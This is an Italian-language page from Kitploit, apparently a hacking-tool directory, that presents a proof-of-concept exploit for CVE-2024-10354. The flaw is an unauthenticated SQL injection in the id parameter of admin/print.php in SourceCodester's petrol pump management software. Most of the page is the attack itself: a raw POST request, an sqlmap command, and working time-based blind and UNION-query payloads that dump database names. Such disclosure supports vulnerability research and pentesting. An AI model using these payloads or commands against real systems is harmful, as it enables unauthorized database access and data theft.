Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-10354 — Exploit proof-of-concept per CVE-2024-10354: SQL injection nel software di gestione pompe di benzina SourceCodester v1.0. Dimostra l'iniezione SQL basata sul tempo e UNION query non autenticata tramite admin/print.php per estrarre il contenuto del database. | Kitploit
Strumenti/GitHubGitHub/k1nakoo/cve-2024-10354
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubk1nakoo/cve-2024-10354

CVE-2024-10354

Exploit proof-of-concept per CVE-2024-10354: SQL injection nel software di gestione pompe di benzina SourceCodester v1.0. Dimostra l'iniezione SQL basata sul tempo e UNION query non autenticata tramite admin/print.php per estrarre il contenuto del database.

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Codice sorgente

Petrol pump management software free download | SourceCodester

Descrizione

Vulnerabilità di SQL injection nel software di gestione delle pompe di benzina sourcecodester v1.0. È stata riscontrata una vulnerabilità classificata ad alto rischio che interessa una funzionalità sconosciuta del file admin\print.php. Utilizzando il parametro id per costruire istruzioni SQL dannose al fine di ottenere informazioni sensibili, causando così danni.

Analisi della vulnerabilità

admin\print.php

image-20241023155634643

Qui, l'input utente $_POST['id'] viene concatenato nell'istruzione della query SQL, che è chiaramente suscettibile ad attacchi di SQL injection

Riproduzione della vulnerabilità

image-20241023160251059

root@kitploit:~
POST /admin/print.php HTTP/1.1
Host: 10.151.167.168:6677
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 4

id=1*

Salvare il pacchetto e utilizzare sqlmap per l'attacco

root@kitploit:~
payload:
python3 sqlmap.py --random-agent --batch -r data.txt --risk 3 --dbs

image-20241023160627277

root@kitploit:~
---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 8405 FROM (SELECT(SLEEP(5)))RBvx) AND 'WWQR'='WWQR

    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171706271,0x744d4a644a516944425443614f4c594948754b4a746356615251435951444f72597a74534274424a,0x71706a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---

Osservando il pacchetto, non ho aggiunto alcun valore di cookie, il che indica che non è richiesta alcuna autenticazione: non è necessario effettuare il login per lanciare attacchi da remoto

Si può notare che questo payload utilizza due metodi di injection, time-based blind e UNION query, e recupera con successo il nome del database.

Scarica lo strumento